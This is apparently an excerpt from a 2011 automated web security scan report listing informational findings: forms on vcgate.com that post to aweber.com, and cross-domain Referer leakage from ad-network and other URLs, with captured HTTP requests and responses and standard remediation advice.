<input type="hidden" name="meta_web_form_id" value="658109">
...[SNIP]...

18.5. http://www.vcgate.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vcgate.com
Path:	/favicon.ico

Issue detail

The page contains a form which POSTs data to the domain www.aweber.com. The form contains the following fields:

meta_web_form_id
meta_split_id
listname
redirect
meta_adtracking
meta_message
meta_required
meta_forward_vars
meta_tooltip
name
email
submit

Request

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 11:05:35 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-Pingback: http://www.vcgate.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 12 May 2011 11:05:35 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 38977

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</style>
<form method="post" class="af-form-wrapper" action="http://www.aweber.com/scripts/addlead.pl" >
<div style="display: none;">
...[SNIP]...

18.6. http://www.vcgate.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vcgate.com
Path:	/favicon.ico

Issue detail

The page contains a form which POSTs data to the domain www.aweber.com. The form contains the following fields:

meta_web_form_id
meta_split_id
listname
redirect
meta_adtracking
meta_message
meta_required
meta_tooltip
name
from
submit

Request

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 11:05:35 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-Pingback: http://www.vcgate.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 12 May 2011 11:05:35 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 38977

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</p>

<form method="post" class="af-form-wrapper" action="http://www.aweber.com/scripts/addlead.pl" >

<div style="display: none;">
...[SNIP]...

18.7. http://www.vcgate.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vcgate.com
Path:	/favicon.ico

Issue detail

The page contains a form which POSTs data to the domain www.aweber.com. The form contains the following fields:

meta_web_form_id
meta_split_id
listname
redirect
meta_adtracking
meta_message
meta_required
meta_tooltip
name
from
submit

Request

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 11:05:35 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-Pingback: http://www.vcgate.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 12 May 2011 11:05:35 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 38977

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</p>

<form method="post" class="af-form-wrapper" action="http://www.aweber.com/scripts/addlead.pl" >

<div style="display: none;">
...[SNIP]...

18.8. http://www.vcgate.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vcgate.com
Path:	/favicon.ico

Issue detail

The page contains a form which POSTs data to the domain www.aweber.com. The form contains the following fields:

meta_web_form_id
meta_split_id
unit
redirect
meta_redirect_onlist
meta_adtracking
meta_message
meta_required
meta_forward_vars
name
from
submit

Request

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 11:05:35 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-Pingback: http://www.vcgate.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 12 May 2011 11:05:35 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 38977

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<center><form method="post" action="http://www.aweber.com/scripts/addlead.pl">
<input type="hidden" name="meta_web_form_id" value="663859">
...[SNIP]...

18.9. http://www.vcgate.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vcgate.com
Path:	/favicon.ico

Issue detail

The page contains a form which POSTs data to the domain www.aweber.com. The form contains the following fields:

meta_web_form_id
meta_split_id
listname
redirect
meta_redirect_onlist
meta_adtracking
meta_message
meta_required
meta_forward_vars
meta_tooltip
name
from
submit

Request

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 11:05:35 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-Pingback: http://www.vcgate.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 12 May 2011 11:05:35 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 38977

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="bottombars" class="btb3" >
<form method="post" class="af-form-wrapper" action="http://www.aweber.com/scripts/addlead.pl" >
<div style="display: none;">
...[SNIP]...

19. Cross-domain Referer leakage previous next
There are 61 instances of this issue:

http://ad-emea.doubleclick.net/adi/N568.273558.BLOOMBERG1/B3885816.3
http://ad-emea.doubleclick.net/adj/N1379.290479.MEDIABUYER/B5191871
http://ad.doubleclick.net/adj/N5877.774.5057472001621/B5104260
http://ad.doubleclick.net/adj/fbn
http://ad.doubleclick.net/adj/fbn/markets
http://ad.doubleclick.net/adj/fbn/markets
http://ad.turn.com/server/ads.js
http://ad.us.doubleclick.net/adj/ftcom.5887.ftfm/private-equity
http://ad.yieldmanager.com/pixel
http://admeld.adnxs.com/usersync
http://ads.adsonar.com/adserving/getAds.jsp
http://ads.bloomberg.com/adstream_mjx.ads/bloombergopt/news/sports/international/story/1340347661@x24,x70,x60,x62,x80,x81,x82,x83
http://ads1.revenue.net/j
http://cm.g.doubleclick.net/pixel
http://cm.g.doubleclick.net/pixel
http://cm.g.doubleclick.net/pixel
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://img.mediaplex.com/content/0/15917/119013/OD_Promises_Domestic_300x250.js
http://maps.google.com/maps
http://pepperhamilton.com/
http://pixel.invitemedia.com/admeld_sync
http://privatemoneytalk.com/
http://securelab.digiware.net/
http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros
http://topics.nytimes.com/topics/reference/timestopics/subjects/p/private_equity/index.html
http://topics.nytimes.com/topics/reference/timestopics/subjects/p/private_equity/index.html
https://webmail.tuckerellis.com/exchweb/bin/auth/owalogon.asp
https://ww3.janus.com/advisor/about-janus
http://www.apolloglobal.us/index.php
http://www.butlerrubin.com/web/br.nsf/index
http://www.digiware.net/index.php
http://www.facebook.com/plugins/like.php
http://www.foxbusiness.com/static/all/js/ad.js
http://www.foxbusiness.com/static/all/js/head.js
http://www.google.com/search
http://www.google.com/search
http://www.google.com/search
http://www.google.com/search
http://www.google.com/search
http://www.google.com/search
http://www.google.com/search
http://www.google.com/search
http://www.google.com/search
http://www.google.com/search
http://www.google.com/search
http://www.google.com/search
http://www.google.com/search
http://www.google.com/search
http://www.google.com/search
http://www.google.com/search
http://www.google.com/search
http://www.pomerantzlaw.com/attorneys.html
http://www.pomerantzlaw.com/cases.html
http://www.provequity.com/about_us/index.asp
http://www.provequity.com/portfolio/index.asp
http://www.provequity.com/regions/index.asp
http://www.provequity.com/team/index.asp

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

19.1. http://ad-emea.doubleclick.net/adi/N568.273558.BLOOMBERG1/B3885816.3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad-emea.doubleclick.net
Path:	/adi/N568.273558.BLOOMBERG1/B3885816.3

Issue detail

The page was loaded from a URL containing a query string:

http://ad-emea.doubleclick.net/adi/N568.273558.BLOOMBERG1/B3885816.3;sz=88x31;click0=http://ads.bloomberg.com/RealMedia/ads/click_lx.ads/bloombergopt/news/sports/international/story/L44/2095024673/x81/Bloomberg/3848309/DowJones_DART_NewsTradebar_88x31.html/72634857383032345a51594144454b2b?;ord=2095024673?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/1164544/1-88x31.gif

Request

GET /adi/N568.273558.BLOOMBERG1/B3885816.3;sz=88x31;click0=http://ads.bloomberg.com/RealMedia/ads/click_lx.ads/bloombergopt/news/sports/international/story/L44/2095024673/x81/Bloomberg/3848309/DowJones_DART_NewsTradebar_88x31.html/72634857383032345a51594144454b2b?;ord=2095024673? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 634
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 12 May 2011 11:37:31 GMT
Expires: Thu, 12 May 2011 11:37:31 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad-emea.doubleclick.net/click;h=v8/3b05/14/cd
...[SNIP]...
ergopt/news/sports/international/story/L44/2095024673/x81/Bloomberg/3848309/DowJones_DART_NewsTradebar_88x31.html/72634857383032345a51594144454b2b?https://order.barrons.com/sub/xdef/002/6BCWAA_OOTB23"><img src="http://s0.2mdn.net/viewad/1164544/1-88x31.gif" border=0 alt="Advertisement"></a>
...[SNIP]...

19.2. http://ad-emea.doubleclick.net/adj/N1379.290479.MEDIABUYER/B5191871 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad-emea.doubleclick.net
Path:	/adj/N1379.290479.MEDIABUYER/B5191871

Issue detail

The page was loaded from a URL containing a query string:

http://ad-emea.doubleclick.net/adj/N1379.290479.MEDIABUYER/B5191871;sz=88x31;click0=http://ads.bloomberg.com/RealMedia/ads/click_lx.ads/bloombergopt/news/sports/international/story/L44/939683557/x82/Bloomberg/3750448/Citifx_Button_88x31_March11th.html/72634857383032345a51594144454b2b?;ord=939683557?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/3055127/CitiFXPro_USRetail_StaticNonAnimated_88x31_v1.gif

Request

GET /adj/N1379.290479.MEDIABUYER/B5191871;sz=88x31;click0=http://ads.bloomberg.com/RealMedia/ads/click_lx.ads/bloombergopt/news/sports/international/story/L44/939683557/x82/Bloomberg/3750448/Citifx_Button_88x31_March11th.html/72634857383032345a51594144454b2b?;ord=939683557? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 616
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 12 May 2011 11:37:31 GMT
Expires: Thu, 12 May 2011 11:37:31 GMT
Discarded: true

document.write('<a target="_blank" href="http://ad-emea.doubleclick.net/click;h=v8/3b05/14/c9/%2a/f;241152358;0-0;0;59489383;21-88/31;42134834/42152621/1;;~sscs=%3fhttp://ads.bloomberg.com/RealMedia/a
...[SNIP]...
683557/x82/Bloomberg/3750448/Citifx_Button_88x31_March11th.html/72634857383032345a51594144454b2b?http://www.citifxpro.com/Forex-Trading-with-Citi?utm_campaign=&utm_source=mediabuyer&utm_medium=banner"><img src="http://s0.2mdn.net/viewad/3055127/CitiFXPro_USRetail_StaticNonAnimated_88x31_v1.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

19.3. http://ad.doubleclick.net/adj/N5877.774.5057472001621/B5104260 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5877.774.5057472001621/B5104260

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/N5877.774.5057472001621/B5104260;sz=88x31;click0=http://ads.bloomberg.com/RealMedia/ads/click_lx.ads/bloombergopt/news/sports/international/story/L44/443431456/x80/Bloomberg/3526793/3526793.html/72634857383032345a51594144454b2b?;ord=443431456?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2363305/LogoBlue88x31_endless.gif

Request

GET /adj/N5877.774.5057472001621/B5104260;sz=88x31;click0=http://ads.bloomberg.com/RealMedia/ads/click_lx.ads/bloombergopt/news/sports/international/story/L44/443431456/x80/Bloomberg/3526793/3526793.html/72634857383032345a51594144454b2b?;ord=443431456? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 590
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 12 May 2011 11:37:29 GMT
Expires: Thu, 12 May 2011 11:37:29 GMT
Discarded: true

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b05/14/b3/%2a/t;235823875;1-0;0;59604540;21-88/31;42142136/42159923/1;;~sscs=%3fhttp://ads.bloomberg.com/RealMedia/ads/cl
...[SNIP]...
rg/3526793/3526793.html/72634857383032345a51594144454b2b?http://www.forex.com/land-demo2-gen.html?v=displayactivegen&src=201105AMG217&utm_source=Bloomberg&utm_medium=banner&utm_campaign=2011DisplayUS"><img src="http://s0.2mdn.net/viewad/2363305/LogoBlue88x31_endless.gif" border=0 alt="Advertisement"></a>
...[SNIP]...

19.4. http://ad.doubleclick.net/adj/fbn previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/fbn

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/fbn;pos=kontera;sz=1x1;ord=504013981?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2691058/blankgif2.gif

Request

GET /adj/fbn;pos=kontera;sz=1x1;ord=504013981? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:38:27 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 310

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b05/0/0/%2a/y;225079562;0-0;1;22018143;31-1/1;36828959/36846837/1;;~okv=;pos=kontera;sz=1x1;~aopt=2/1/9e/0;~sscs=%3fhttp://www.foxnews.com"><img src="http://s0.2mdn.net/viewad/2691058/blankgif2.gif" border=0 alt="fox news"></a>
...[SNIP]...

19.5. http://ad.doubleclick.net/adj/fbn/markets previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/fbn/markets

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/fbn/markets;comp=;s1=markets;s2=;pos=top5t;ctype=front;ptype=article;url=markets_2011_05_03_legendary-deal-maker-ted-forstmann-treated-brain-cancer_;m1=recession;m2=henry-kravis;m3=rjr-nabisco;m4=junk-bonds;m5=padma-lakshmi;rs=10428;qc=D;qc=T;qc=3995;qc=921;qc=922;qc=928;qc=929;qc=3994;sz=292x30;tile=5;u=10428%7C%7C%7C%7C%7Carticle%7Ctop5t%7Crecession%7Chenry-kravis%7Crjr-nabisco%7Cjunk-bonds%7Cpadma-lakshmi%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C;!c=;ord=504013981?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/1585828/110854_02_Pricing_EII_None_292x30.gif

Request

GET /adj/fbn/markets;comp=;s1=markets;s2=;pos=top5t;ctype=front;ptype=article;url=markets_2011_05_03_legendary-deal-maker-ted-forstmann-treated-brain-cancer_;m1=recession;m2=henry-kravis;m3=rjr-nabisco;m4=junk-bonds;m5=padma-lakshmi;rs=10428;qc=D;qc=T;qc=3995;qc=921;qc=922;qc=928;qc=929;qc=3994;sz=292x30;tile=5;u=10428%7C%7C%7C%7C%7Carticle%7Ctop5t%7Crecession%7Chenry-kravis%7Crjr-nabisco%7Cjunk-bonds%7Cpadma-lakshmi%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C;!c=;ord=504013981? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:38:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 878

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b05/0/0/%2a/r;235228623;0-0;2;22018236;13081-292/30;40856569/40874356/1;u=10428|||||article|top5t|recession|henry-kravis|
...[SNIP]...
292x30;tile=5;u=10428|||||article|top5t|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||;!c=;~aopt=2/1/9e/0;~sscs=%3fhttp://ad.doubleclick.net/clk;236880980;58880931;z"><img src="http://s0.2mdn.net/viewad/1585828/110854_02_Pricing_EII_None_292x30.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

19.6. http://ad.doubleclick.net/adj/fbn/markets previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/fbn/markets

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/fbn/markets;comp=;s1=markets;s2=;pos=snapshot;ctype=front;ptype=article;url=markets_2011_05_03_legendary-deal-maker-ted-forstmann-treated-brain-cancer_;m1=recession;m2=henry-kravis;m3=rjr-nabisco;m4=junk-bonds;m5=padma-lakshmi;rs=10428;qc=D;qc=T;qc=3995;qc=921;qc=922;qc=928;qc=929;qc=3994;sz=292x30;tile=3;u=10428%7C%7C%7C%7C%7Carticle%7Csnapshot%7Crecession%7Chenry-kravis%7Crjr-nabisco%7Cjunk-bonds%7Cpadma-lakshmi%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C;!c=;ord=504013981?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/1585828/1-110062_01_GoPro_TTS_EII_292x30.gif

Request

GET /adj/fbn/markets;comp=;s1=markets;s2=;pos=snapshot;ctype=front;ptype=article;url=markets_2011_05_03_legendary-deal-maker-ted-forstmann-treated-brain-cancer_;m1=recession;m2=henry-kravis;m3=rjr-nabisco;m4=junk-bonds;m5=padma-lakshmi;rs=10428;qc=D;qc=T;qc=3995;qc=921;qc=922;qc=928;qc=929;qc=3994;sz=292x30;tile=3;u=10428%7C%7C%7C%7C%7Carticle%7Csnapshot%7Crecession%7Chenry-kravis%7Crjr-nabisco%7Cjunk-bonds%7Cpadma-lakshmi%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C;!c=;ord=504013981? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:38:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 886

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b05/0/0/%2a/i;235228589;1-0;1;22018236;13081-292/30;41818979/41836766/1;u=10428|||||article|snapshot|recession|henry-krav
...[SNIP]...
x30;tile=3;u=10428|||||article|snapshot|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||;!c=;~aopt=2/1/9e/0;~sscs=%3fhttp://ad.doubleclick.net/clk;240261185;58880943;n"><img src="http://s0.2mdn.net/viewad/1585828/1-110062_01_GoPro_TTS_EII_292x30.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

19.7. http://ad.turn.com/server/ads.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/ads.js

Issue detail

The page was loaded from a URL containing a query string:

http://ad.turn.com/server/ads.js?&pub=2137329&code=8842770&cch=8841762&l=300x250&tmz=-5&area=-1&res=1920&rnd=0.9122231449000537&url=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxbusiness%2F300x250%2Fros%3Ft%3D1305200290013%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253A%252F%252Fwww.foxbusiness.com%252Fmarkets%252F2011%252F05%252F03%252Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%252F%26refer%3Dhttp%253A%252F%252Fwww.foxbusiness.com%252Fmarkets%252F2011%252F05%252F03%252Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%252F&loc=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxbusiness%2F300x250%2Fros%3Ft%3D1305200290013%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253A%252F%252Fwww.foxbusiness.com%252Fmarkets%252F2011%252F05%252F03%252Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%252F%26refer%3Dhttp%253A%252F%252Fwww.foxbusiness.com%252Fmarkets%252F2011%252F05%252F03%252Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%252F

The response contains the following links to other domains:

http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=bsr&FlightID=2362495&Page=&PluID=0&Pos=4970
http://segments.adap.tv/data/?p=cadreon&type=gif&segment=11&add=true

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Sat, 14 May 2011 11:39:23 GMT
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Tue, 08-Nov-2011 11:39:23 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
